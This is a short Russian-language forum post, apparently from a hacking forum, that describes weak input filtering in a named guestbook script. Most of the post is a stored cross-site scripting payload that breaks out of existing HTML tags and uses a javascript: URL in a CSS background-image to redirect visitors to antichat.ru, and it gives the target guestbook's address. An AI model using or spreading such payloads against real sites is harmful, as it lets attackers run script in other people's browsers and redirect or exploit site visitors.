Поста в этой гостевой книге проверяется лишь поверхнастно. В текст самого сообщения можно вставить любой скрипт. Для примера вставляем вот этот </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE"><a style=background-image:url(javascript:navigate('http://antichat.ru'));[/QUOTE]<span id='postcolor'> И получаем редирект на сайт АНТИЧАТ. Адрес гостевой http://www.ultimatephp.com/guestbookv4.htm